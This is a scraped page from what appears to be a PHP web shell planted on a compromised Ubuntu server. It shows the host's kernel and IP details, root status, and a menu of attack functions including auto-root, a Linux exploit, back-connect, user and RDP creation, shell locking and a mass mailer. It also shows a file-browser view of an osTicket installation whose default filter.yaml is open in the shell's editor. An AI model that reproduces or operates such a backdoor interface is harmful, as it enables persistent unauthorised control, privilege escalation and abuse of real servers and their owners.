Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
osticket /
upload /
include /
i18n /
en_US /
[ HOME SHELL ]
Name
Size
Permission
Action
help
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
config.yaml
2.32
KB
-rw-r--r--
department.yaml
894
B
-rw-r--r--
email_template_group.yaml
621
B
-rw-r--r--
event.yaml
755
B
-rw-r--r--
file.yaml
13.57
KB
-rw-r--r--
filter.yaml
1.23
KB
-rw-r--r--
form.yaml
5.39
KB
-rw-r--r--
group.yaml
998
B
-rw-r--r--
help_topic.yaml
1.5
KB
-rw-r--r--
list.yaml
1.64
KB
-rw-r--r--
organization.yaml
637
B
-rw-r--r--
priority.yaml
477
B
-rw-r--r--
queue.yaml
11.15
KB
-rw-r--r--
queue_column.yaml
3.08
KB
-rw-r--r--
queue_sort.yaml
611
B
-rw-r--r--
role.yaml
1.42
KB
-rw-r--r--
schedule.yaml
3.71
KB
-rw-r--r--
sequence.yaml
779
B
-rw-r--r--
sla.yaml
912
B
-rw-r--r--
team.yaml
405
B
-rw-r--r--
ticket_status.yaml
1.31
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : filter.yaml
# # Default ticket filters installed for the system # # NOTE: The SYSTEM BAN LIST is critically important and should _never_ be # removed from this file. The name 'SYSTEM BAN LIST' is also important # and should not be translated -- it is not displayed on the interface # # Fields: # isactive - (bool:0|1) true or false if the filter is initially enabled # execorder - (int) order the filters should be executed in (lowest first) # name - (string) Descriptive name for the filter # notes - (string) Administrative notes (viewable internally only) # rules - (list<FilterRule>) List of rules for the filter # # Fields for FilterRule: # isactive - (bool:0|1) true if the rule should be considered # what - (enum<email|>) field to check # how - (enum<equals|contains|dncontain>) how to check for <val> # val - (string) search value # # Fields for FilterAction # type - type of filter action # --- - isactive: 1 execorder: 99 match_all_rules: 0 email_id: 0 target: Email #notrans name: SYSTEM BAN LIST #notrans notes: | Internal list for email banning. Do not remove rules: - isactive: 1 what: email #notrans how: equal #notrans val: test@example.com #notrans actions: - sort: 1 type: reject #notrans
Close